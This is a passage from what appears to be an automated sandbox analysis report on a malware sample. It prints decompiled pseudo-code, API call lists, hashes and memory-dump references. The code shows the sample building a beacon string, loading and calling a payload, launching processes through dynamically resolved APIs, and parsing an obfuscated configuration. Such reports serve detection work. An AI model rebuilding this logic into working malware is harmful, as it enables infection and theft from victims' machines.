				intOrPtr _t84;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t91;
				int _t94;
				intOrPtr _t95;
				int _t98;
				void* _t101;
				void* _t102;
				void* _t106;
				intOrPtr _t108;
				long _t110;
				intOrPtr _t111;
				intOrPtr* _t112;
				long _t113;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t124;

				_t106 = __edx;
				_t113 = __eax;
				_v8 = 8;
				_t120 = RtlAllocateHeap( *0x4f6d1f0, 0, 0x800);
				if(_t120 != 0) {
					if(_t113 == 0) {
						_t113 = GetTickCount();
					}
					_t32 =  *0x4f6d018; // 0x658828bf
					asm("bswap eax");
					_t33 =  *0x4f6d014; // 0x5cb11ae7
					asm("bswap eax");
					_t34 =  *0x4f6d010; // 0x15dc9586
					asm("bswap eax");
					_t35 =  *0x4f6d00c; // 0x8e03bf7
					asm("bswap eax");
					_t36 =  *0x4f6d230; // 0xf0a5a8
					_t2 = _t36 + 0x4f6e622; // 0x74666f73
					_t114 = wsprintfA(_t120, _t2, 2, 0x3d12b, _t35, _t34, _t33, _t32,  *0x4f6d02c,  *0x4f6d004, _t113);
					_t39 = E04F61D4A();
					_t40 =  *0x4f6d230; // 0xf0a5a8
					_t3 = _t40 + 0x4f6e662; // 0x74707526
					_t43 = wsprintfA(_t114 + _t120, _t3, _t39);
					_t123 = _t121 + 0x38;
					_t115 = _t114 + _t43;
					if(_a12 != 0) {
						_t95 =  *0x4f6d230; // 0xf0a5a8
						_t7 = _t95 + 0x4f6e66d; // 0x732526
						_t98 = wsprintfA(_t115 + _t120, _t7, _a12);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t98;
					}
					_t44 = E04F6340E(_t102);
					_t45 =  *0x4f6d230; // 0xf0a5a8
					_t9 = _t45 + 0x4f6e38a; // 0x6d697426
					_t116 = _t115 + wsprintfA(_t115 + _t120, _t9, _t44, _t106);
					_t49 =  *0x4f6d230; // 0xf0a5a8
					_t11 = _t49 + 0x4f6e33b; // 0x74636126
					_t117 = _t116 + wsprintfA(_t116 + _t120, _t11, 0);
					_t53 =  *0x4f6d284; // 0x5e795b0
					_t124 = _t123 + 0x1c;
					if(_t53 != 0) {
						_t91 =  *0x4f6d230; // 0xf0a5a8
						_t13 = _t91 + 0x4f6e685; // 0x73797326
						_t94 = wsprintfA(_t117 + _t120, _t13, _t53);
						_t124 = _t124 + 0xc;
						_t117 = _t117 + _t94;
					}
					_t108 =  *0x4f6d2d4; // 0x5e79630
					_a28 = E04F628E2(0x4f6d00a, _t108 + 4);
					_t56 =  *0x4f6d278; // 0x5e795e0
					_t110 = 0;
					if(_t56 != 0) {
						_t87 =  *0x4f6d230; // 0xf0a5a8
						_t16 = _t87 + 0x4f6e8f1; // 0x3d736f26
						_t90 = wsprintfA(_t117 + _t120, _t16, _t56);
						_t124 = _t124 + 0xc;
						_t117 = _t117 + _t90;
					}
					_t57 =  *0x4f6d274; // 0x0
					if(_t57 != _t110) {
						_t84 =  *0x4f6d230; // 0xf0a5a8
						_t18 = _t84 + 0x4f6e8ea; // 0x3d706926
						wsprintfA(_t117 + _t120, _t18, _t57);
					}
					if(_a28 != _t110) {
						_t101 = RtlAllocateHeap( *0x4f6d1f0, _t110, 0x800);
						if(_t101 != _t110) {
							E04F617C4(GetTickCount());
							_t63 =  *0x4f6d2d4; // 0x5e79630
							__imp__(_t63 + 0x40);
							asm("lock xadd [eax], ecx");
							_t67 =  *0x4f6d2d4; // 0x5e79630
							__imp__(_t67 + 0x40);
							_t69 =  *0x4f6d2d4; // 0x5e79630
							_t118 = E04F69488(1, _t106, _t120,  *_t69);
							asm("lock xadd [eax], ecx");
							if(_t118 != _t110) {
								StrTrimA(_t118, 0x4f6c2b4);
								_t75 =  *0x4f6d230; // 0xf0a5a8
								_push(_t118);
								_t20 = _t75 + 0x4f6e2d2; // 0x53002f
								_t111 = E04F65F0B(_t20);
								_v8 = _t111;
								if(_t111 != 0) {
									 *_t118 = 0;
									__imp__(_t101, _a4);
									_t112 = __imp__;
									 *_t112(_t101, _t111);
									 *_t112(_t101, _t118);
									_t81 = E04F63BA2(0xffffffffffffffff, _t101, _v16, _v12);
									_v44 = _t81;
									if(_t81 != 0 && _t81 != 0x10d2) {
										E04F6185B();
									}
									HeapFree( *0x4f6d1f0, 0, _v28);
								}
								HeapFree( *0x4f6d1f0, 0, _t118);
								_t110 = 0;
							}
							HeapFree( *0x4f6d1f0, _t110, _t101);
						}
						HeapFree( *0x4f6d1f0, _t110, _a20);
					}
					HeapFree( *0x4f6d1f0, _t110, _t120);
				}
				return _v16;
			}

0x04f62201
0x04f62215
0x04f62217
0x04f62225
0x04f62229
0x04f62231
0x04f62239
0x04f62239
0x04f6223b
0x04f62247
0x04f62256
0x04f6225b
0x04f6225e
0x04f62263
0x04f62266
0x04f6226b
0x04f6226e
0x04f6227a
0x04f62287
0x04f62289
0x04f6228f
0x04f62294
0x04f6229f
0x04f622a1
0x04f622a4
0x04f622aa
0x04f622ac
0x04f622b5
0x04f622c0
0x04f622c2
0x04f622c5
0x04f622c5
0x04f622c7
0x04f622ce
0x04f622d3
0x04f622e0
0x04f622e2
0x04f622e7
0x04f622f5
0x04f622f7
0x04f622fc
0x04f62301
0x04f62304
0x04f62309
0x04f62314
0x04f62316
0x04f62319
0x04f62319
0x04f6231b
0x04f6232e
0x04f62332
0x04f62337
0x04f6233b
0x04f6233e
0x04f62343
0x04f6234e
0x04f62350
0x04f62353
0x04f62353
0x04f62355
0x04f6235c
0x04f6235f
0x04f62364
0x04f6236e
0x04f62370
0x04f62377
0x04f6238f
0x04f62393
0x04f6239f
0x04f623a4
0x04f623ad
0x04f623be
0x04f623c2
0x04f623cb
0x04f623d1
0x04f623de
0x04f623eb
0x04f623f1
0x04f623fd
0x04f62403
0x04f62408
0x04f62409
0x04f62415
0x04f62419
0x04f6241d
0x04f62423
0x04f62427
0x04f6242e
0x04f62435
0x04f62439
0x04f62444
0x04f6244b
0x04f6244f
0x04f62458
0x04f62458
0x04f62469
0x04f62469
0x04f62478
0x04f6247e
0x04f6247e
0x04f62488
0x04f62488
0x04f62499
0x04f62499
0x04f624a7
0x04f624a7
0x04f624b7

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,00000000), ref: 04F6221F
GetTickCount.KERNEL32 ref: 04F62233
wsprintfA.USER32 ref: 04F62282
wsprintfA.USER32 ref: 04F6229F
wsprintfA.USER32 ref: 04F622C0
wsprintfA.USER32 ref: 04F622DE
wsprintfA.USER32 ref: 04F622F3
wsprintfA.USER32 ref: 04F62314
wsprintfA.USER32 ref: 04F6234E
wsprintfA.USER32 ref: 04F6236E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F62389
GetTickCount.KERNEL32 ref: 04F62399
RtlEnterCriticalSection.NTDLL(05E795F0), ref: 04F623AD
RtlLeaveCriticalSection.NTDLL(05E795F0), ref: 04F623CB

Part of subcall function 04F69488: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F694B3
Part of subcall function 04F69488: lstrlen.KERNEL32(00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F694BB
Part of subcall function 04F69488: strcpy.NTDLL ref: 04F694D2
Part of subcall function 04F69488: lstrcat.KERNEL32(00000000,00000000), ref: 04F694DD
Part of subcall function 04F69488: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04F623DE,?,00000000,04F623DE,00000000,05E79630), ref: 04F694FA

StrTrimA.SHLWAPI(00000000,04F6C2B4,00000000,05E79630), ref: 04F623FD

Part of subcall function 04F65F0B: lstrlen.KERNEL32(04F62415,00000000,00000000,04F62415,0053002F,00000000), ref: 04F65F17
Part of subcall function 04F65F0B: lstrlen.KERNEL32(?), ref: 04F65F1F
Part of subcall function 04F65F0B: lstrcpy.KERNEL32(00000000,?), ref: 04F65F36
Part of subcall function 04F65F0B: lstrcat.KERNEL32(00000000,?), ref: 04F65F41

lstrcpy.KERNEL32(00000000,?), ref: 04F62427
lstrcat.KERNEL32(00000000,00000000), ref: 04F62435
lstrcat.KERNEL32(00000000,00000000), ref: 04F62439
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04F62469
HeapFree.KERNEL32(00000000,00000000,0053002F,00000000), ref: 04F62478
HeapFree.KERNEL32(00000000,00000000,00000000,05E79630), ref: 04F62488
HeapFree.KERNEL32(00000000,?), ref: 04F62499
HeapFree.KERNEL32(00000000,00000000), ref: 04F624A7

Strings

Ut, xrefs: 04F62469, 04F62478, 04F62488, 04F62499, 04F624A7

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: Ut
API String ID: 1837416118-8415677
Opcode ID: 6e57fa679a1166017301bd127015c84e47328bd213d1c6f71a05705f9ee49f17
Instruction ID: c4e7dab76afe195b67202c15862385dbca4a57fe3ab23e535640e8ddb8733896
Opcode Fuzzy Hash: 6e57fa679a1166017301bd127015c84e47328bd213d1c6f71a05705f9ee49f17
Instruction Fuzzy Hash: BF715B72600109FFE721EBA9FD88E5677ECEB48304B160555F9AAD3214D639EC06CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 143synchronizationsleeppipeCOMMON

Download Yara Rule

APIs

BeginUpdateResourceW.KERNEL32(00000000,00000000), ref: 0041A0DD
CallNamedPipeA.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000), ref: 0041A120
WaitForSingleObject.KERNEL32(00000000,00000000,031D6658,02F71A10), ref: 0041A145
Sleep.KERNEL32(00000000), ref: 0041A14D
CompareFileTime.KERNEL32(00000000,00000000,031D6658,02F71A10), ref: 0041A184
InterlockedIncrement.KERNEL32(?), ref: 0041A18F
CreateMutexW.KERNEL32(00000000,00000000,00000000,031D6658,02F71A10), ref: 0041A1A9
SetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0041A1D1
GetTapeStatus.KERNEL32(00000000), ref: 0041A1E7
SetTapeParameters.KERNEL32(00000000,00000000,00000000), ref: 0041A1F3
WriteTapemark.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041A201
DeleteVolumeMountPointA.KERNEL32(00000000), ref: 0041A209
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000,031D6658,02F71A10), ref: 0041A230
IsSystemResumeAutomatic.KERNEL32 ref: 0041A24D
GetPrivateProfileSectionNamesW.KERNEL32(?,00000000,00000000), ref: 0041A2A0

Strings

, xrefs: 0041A127

Memory Dump Source

Source File: 00000000.00000002.575989176.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Tape$AutomaticBeginCallCommCompareConfigConsoleCreateDefaultDeleteFileIncrementInterlockedMountMutexNamedNamesObjectParametersPipePointPrivateProfileReadResourceResumeSectionSingleSleepStatusSystemTapemarkTimeUpdateVolumeWaitWrite
String ID:
API String ID: 948087139-3916222277
Opcode ID: 372f6ac5b52a34e34be975dd6bdb07e7a7899fb0f887c0bc58d33d0b5ac15c56
Instruction ID: 7d4ffe1c580143c42deee6198a8239b2a4fde9abfd0abed2ac61afc36d7cdaf5
Opcode Fuzzy Hash: 372f6ac5b52a34e34be975dd6bdb07e7a7899fb0f887c0bc58d33d0b5ac15c56
Instruction Fuzzy Hash: 6B51A331646340EFF320DF50EC49B5AB7F4BB88751F80452DF6486A2D0D7B46989CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 04F6609F, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 111
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E04F6609F(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t42;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t52;
				void* _t60;
				intOrPtr* _t65;
				intOrPtr _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t39 = E04F685A9(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
				_t42 = _v12(_v12);
				_v8 = _t42;
				if(_t42 == 0 && ( *0x4f6d218 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t49 =  *0x4f6d230; // 0xf0a5a8
					_t18 = _t49 + 0x4f6e55b; // 0x73797325
					_t51 = E04F68F21(_t18);
					_v12 = _t51;
					if(_t51 == 0) {
						_v8 = 8;
					} else {
						_t52 =  *0x4f6d230; // 0xf0a5a8
						_t20 = _t52 + 0x4f6e73d; // 0x5e78ce5
						_t21 = _t52 + 0x4f6e0af; // 0x4e52454b
						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t65 == 0) {
							_v8 = 0x7f;
						} else {
							_t71 = __imp__;
							_v108 = 0x44;
							 *_t71(0);
							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t71(1);
							if(_t60 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4f6d1f0, 0, _v12);
					}
				}
				_t74 = _v16;
				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
				E04F61D77(_t74);
				goto L12;
			}

0x04f660a8
0x04f660a8
0x04f660b6
0x04f660bf
0x04f660c2
0x04f661d7
0x04f661de
0x04f661de
0x04f660d1
0x04f660dc
0x04f660e1
0x04f660e4
0x04f660f9
0x04f660ff
0x04f66100
0x04f66103
0x04f66109
0x04f6610c
0x04f66111
0x04f66119
0x04f66120
0x04f66127
0x04f6612a
0x04f661be
0x04f66130
0x04f66130
0x04f66135
0x04f6613c
0x04f66150
0x04f66154
0x04f661a5
0x04f66156
0x04f66156
0x04f6615d
0x04f66164
0x04f6617c
0x04f66182
0x04f66186
0x04f661a0
0x04f66188
0x04f66191
0x04f66196
0x04f66196
0x04f66186
0x04f661b6
0x04f661b6
0x04f6612a
0x04f661c5
0x04f661ce
0x04f661d2
0x00000000

APIs

Part of subcall function 04F685A9: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,04F660BB,?,?,?,?,00000000,00000000), ref: 04F685CE
Part of subcall function 04F685A9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F685F0
Part of subcall function 04F685A9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F68606
Part of subcall function 04F685A9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F6861C
Part of subcall function 04F685A9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F68632
Part of subcall function 04F685A9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F68648

memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 04F660D1
memset.NTDLL ref: 04F6610C

Part of subcall function 04F68F21: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000001,59935A4D,04F63F6D,73797325), ref: 04F68F32
Part of subcall function 04F68F21: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F68F4C

GetModuleHandleA.KERNEL32(4E52454B,05E78CE5,73797325), ref: 04F66143
GetProcAddress.KERNEL32(00000000), ref: 04F6614A
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04F66164
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04F66182
CloseHandle.KERNEL32(00000000), ref: 04F66191
CloseHandle.KERNEL32(?), ref: 04F66196
GetLastError.KERNEL32 ref: 04F6619A
HeapFree.KERNEL32(00000000,?), ref: 04F661B6

Strings

Ut, xrefs: 04F661B6

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemcpymemset
String ID: Ut
API String ID: 1222765985-8415677
Opcode ID: c247372c3a6e6593ce74501923fa542208523d4bbff764a5aa526466623b5b49
Instruction ID: b1d4f0ca3fe1f261fa816b54624a62341409b39db0280cd3be9d372b13e19404
Opcode Fuzzy Hash: c247372c3a6e6593ce74501923fa542208523d4bbff764a5aa526466623b5b49
Instruction Fuzzy Hash: BD413776900218FBEB11AFE4EC48ADEBFB9EF08744F104051E216E3111D779AA56DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F669C6, Relevance: 15.1, APIs: 10, Instructions: 124
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E04F669C6(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				char* _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t41;
				intOrPtr _t42;
				char _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				char* _t69;
				intOrPtr* _t72;
				void* _t73;
				void* _t74;
				char* _t75;
				intOrPtr _t76;
				intOrPtr* _t80;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr _t90;

				_t73 = __ecx;
				_t80 =  *0x4f6d2ec; // 0x5e79c10
				_v20 = 8;
				_v16 = GetTickCount();
				_t41 = E04F684DE(_t73,  &_v16);
				_v8 = _t41;
				if(_t41 == 0) {
					_v8 = 0x4f6c1bc;
				}
				_t86 = _t80;
				_t74 = 0;
				do {
					_t42 =  *_t80;
					if(_t42 == 0x5c) {
						_t74 = _t74 + 1;
					}
					_t74 = _t74 + 1;
					_t80 = _t80 + 1;
				} while (_t42 != 0);
				_t69 = E04F62CDB(_t74);
				_v12 = _t69;
				if(_t69 == 0) {
					L16:
					return _v20;
				}
				_t75 = _t69;
				do {
					_t45 =  *_t86;
					if(_t45 == 0x5c) {
						 *_t75 = _t45;
						_t75 = _t75 + 1;
					}
					 *_t75 = _t45;
					_t75 = _t75 + 1;
					_t86 = _t86 + 1;
				} while (_t45 != 0);
				_t87 = __imp__;
				_t46 =  *_t87(_v8);
				_t47 =  *_t87(_t69);
				_t48 =  *_t87(_a4);
				_t49 = lstrlenW(_a8);
				_t53 = E04F62CDB(lstrlenW(0x4f6eae8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x4f6eae8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
				_v16 = _t53;
				if(_t53 != 0) {
					_t76 =  *0x4f6d230; // 0xf0a5a8
					_t72 =  *0x4f6d120; // 0x4f6aa58
					_t17 = _t76 + 0x4f6eae8; // 0x530025
					 *_t72(_t53, _t17, _v8, _v8, _a4, _v12, _a8);
					_t56 =  *_t87(_v12);
					_a8 = _t56;
					_t57 =  *_t87(_a4);
					_t58 = lstrlenW(_a12);
					_t90 = E04F62CDB(lstrlenW(0x4f6ebf0) + _a8 + _t57 + _t58 + lstrlenW(0x4f6ebf0) + _a8 + _t57 + _t58 + 2);
					if(_t90 == 0) {
						E04F61D77(_v16);
					} else {
						_t64 =  *0x4f6d230; // 0xf0a5a8
						_t30 = _t64 + 0x4f6ebf0; // 0x73006d
						 *_t72(_t90, _t30, _a4, _v12, _a12);
						 *_a16 = _v16;
						_v20 = _v20 & 0x00000000;
						 *_a20 = _t90;
					}
				}
				E04F61D77(_v12);
				goto L16;
			}

0x04f669c6
0x04f669cf
0x04f669d5
0x04f669e5
0x04f669e8
0x04f669ef
0x04f669f2
0x04f669f4
0x04f669f4
0x04f669fb
0x04f669fd
0x04f669ff
0x04f669ff
0x04f66a03
0x04f66a05
0x04f66a05
0x04f66a06
0x04f66a07
0x04f66a08
0x04f66a12
0x04f66a16
0x04f66a19
0x04f66b12
0x04f66b19
0x04f66b19
0x04f66a1f
0x04f66a21
0x04f66a21
0x04f66a25
0x04f66a27
0x04f66a29
0x04f66a29
0x04f66a2a
0x04f66a2c
0x04f66a2d
0x04f66a2e
0x04f66a35
0x04f66a3b
0x04f66a42
0x04f66a49
0x04f66a57
0x04f66a69
0x04f66a70
0x04f66a73
0x04f66a7c
0x04f66a85
0x04f66a8e
0x04f66a9c
0x04f66aa4
0x04f66aa9
0x04f66aac
0x04f66ab7
0x04f66ace
0x04f66ad2
0x04f66b05
0x04f66ad4
0x04f66ad7
0x04f66adf
0x04f66aea
0x04f66af2
0x04f66afa
0x04f66afe
0x04f66afe
0x04f66ad2
0x04f66b0d
0x00000000

APIs

GetTickCount.KERNEL32 ref: 04F669DC
lstrlen.KERNEL32(?,00000001), ref: 04F66A3B
lstrlen.KERNEL32(00000000), ref: 04F66A42
lstrlen.KERNEL32(00000000), ref: 04F66A49
lstrlenW.KERNEL32(80000002), ref: 04F66A57
lstrlenW.KERNEL32(04F6EAE8), ref: 04F66A60
lstrlen.KERNEL32(?), ref: 04F66AA4
lstrlen.KERNEL32(?), ref: 04F66AAC
lstrlenW.KERNEL32(?), ref: 04F66AB7
lstrlenW.KERNEL32(04F6EBF0), ref: 04F66AC0

Part of subcall function 04F61D77: HeapFree.KERNEL32(00000000,00000000,04F69825,00000000,?,?,-00000008), ref: 04F61D83

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: d729cfc4bdec74192e9ab462664f73c85e6f165ade0a61c6cfa45b91b0a4b115
Instruction ID: fb6b933b400737961bd399d5619c803d0579bc64492b2fa484142872b71d522f
Opcode Fuzzy Hash: d729cfc4bdec74192e9ab462664f73c85e6f165ade0a61c6cfa45b91b0a4b115
Instruction Fuzzy Hash: F941C136D00209FBDF01AFA4DC40DAD7FB9FF08348B0540A9E956A3211DB35AA16DF60

Uniqueness

Uniqueness Score: -1.00%

Function 04F692A2, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 185
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E04F692A2(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t18;
				signed int _t23;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t40;
				void* _t42;
				void* _t43;
				signed int _t45;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				void* _t70;
				intOrPtr _t85;

				_t71 = __ecx;
				_t18 =  *0x4f6d22c; // 0x59935a40
				if(E04F61663( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x4f6d27c = _v12;
				}
				_t23 =  *0x4f6d22c; // 0x59935a40
				if(E04F61663( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t70 = _v12;
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t65 =  *0x4f6d22c; // 0x59935a40
						_t29 = E04F64804(_t71, _t70, _t65 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x4f6d1f8 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t61 =  *0x4f6d22c; // 0x59935a40
						_t30 = E04F64804(_t71, _t70, _t61 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x4f6d1fc = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t57 =  *0x4f6d22c; // 0x59935a40
						_t31 = E04F64804(_t71, _t70, _t57 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x4f6d200 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t53 =  *0x4f6d22c; // 0x59935a40
						_t32 = E04F64804(_t71, _t70, _t53 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x4f6d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t49 =  *0x4f6d22c; // 0x59935a40
						_t33 = E04F64804(_t71, _t70, _t49 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x4f6d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t45 =  *0x4f6d22c; // 0x59935a40
						_t34 = E04F64804(_t71, _t70, _t45 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t42 = 0x10;
						_t43 = E04F66842(_t42);
						if(_t43 != 0) {
							_push(_t43);
							E04F615AF();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t40 =  *0x4f6d22c; // 0x59935a40
						_t35 = E04F64804(_t71, _t70, _t40 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E04F66842(0, _t35) != 0) {
						_t85 =  *0x4f6d2d4; // 0x5e79630
						E04F61304(_t85 + 4, _t38);
					}
					HeapFree( *0x4f6d1f0, 0, _t70);
					L48:
					return 0;
				}
			}

0x04f692a2
0x04f692a5
0x04f692c5
0x04f692d3
0x04f692d3
0x04f692d8
0x04f692f2
0x04f69479
0x04f6947b
0x00000000
0x04f692f8
0x04f692f8
0x04f692ff
0x04f69315
0x04f69301
0x04f69301
0x04f6930e
0x04f6930e
0x04f6931f
0x04f69321
0x04f6932b
0x04f69330
0x04f69330
0x04f6932b
0x04f69337
0x04f6934d
0x04f69339
0x04f69339
0x04f69346
0x04f69346
0x04f69351
0x04f69353
0x04f6935d
0x04f69362
0x04f69362
0x04f6935d
0x04f69369
0x04f6937f
0x04f6936b
0x04f6936b
0x04f69378
0x04f69378
0x04f69383
0x04f69385
0x04f6938f
0x04f69394
0x04f69394
0x04f6938f
0x04f6939b
0x04f693b1
0x04f6939d
0x04f6939d
0x04f693aa
0x04f693aa
0x04f693b5
0x04f693b7
0x04f693c1
0x04f693c6
0x04f693c6
0x04f693c1
0x04f693cd
0x04f693e3
0x04f693cf
0x04f693cf
0x04f693dc
0x04f693dc
0x04f693e7
0x04f693e9
0x04f693f3
0x04f693f8
0x04f693f8
0x04f693f3
0x04f693ff
0x04f69415
0x04f69401
0x04f69401
0x04f6940e
0x04f6940e
0x04f69419
0x04f6941b
0x04f6941e
0x04f6941f
0x04f69426
0x04f69428
0x04f69429
0x04f69429
0x04f69426
0x04f69430
0x04f69446
0x04f69432
0x04f69432
0x04f6943f
0x04f6943f
0x04f6944a
0x04f69458
0x04f69462
0x04f69462
0x04f6946f
0x04f6947c
0x04f69480
0x04f69480

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,59935A40,00000001,00000000,59935A40,E8FA7DD7,04F6D00C,7691C740,?,00000001,00000000), ref: 04F69327
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,59935A40,00000001,00000000,59935A40,E8FA7DD7,04F6D00C,7691C740,?,00000001,00000000), ref: 04F69359
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,59935A40,00000001,00000000,59935A40,E8FA7DD7,04F6D00C,7691C740,?,00000001,00000000), ref: 04F6938B
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,59935A40,00000001,00000000,59935A40,E8FA7DD7,04F6D00C,7691C740,?,00000001,00000000), ref: 04F693BD
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,59935A40,00000001,00000000,59935A40,E8FA7DD7,04F6D00C,7691C740,?,00000001,00000000), ref: 04F693EF
HeapFree.KERNEL32(00000000,00000001,00000001,00000000,59935A40,00000001,00000000,59935A40,E8FA7DD7,04F6D00C,7691C740,?,00000001,00000000), ref: 04F6946F

Strings

Ut, xrefs: 04F6946F

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

